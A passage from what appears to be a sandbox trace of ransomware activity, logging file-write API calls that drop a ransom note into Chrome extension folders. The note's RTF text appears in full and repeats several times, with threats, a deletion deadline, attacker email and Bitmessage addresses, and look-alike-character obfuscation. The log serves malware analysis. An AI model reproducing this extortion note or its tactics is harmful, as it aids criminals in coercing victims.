th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n³ì\x92;g\x82º×P[@/«ub½á¤ØÍ¥þ\x89Ó8", lpUsedDefaultChar=0x0) returned 8717 [0271.619] WriteFile (in: hFile=0x2c8, lpBuffer=0x1ef7008*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef7008*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0271.620] CloseHandle (hObject=0x2c8) returned 1 [0271.620] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\#readme_eman#.rtf")) returned 0xffffffff [0271.620] GetLastError () returned 0x2 [0271.620] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0271.643] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0271.643] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0271.643] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x23698d8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl 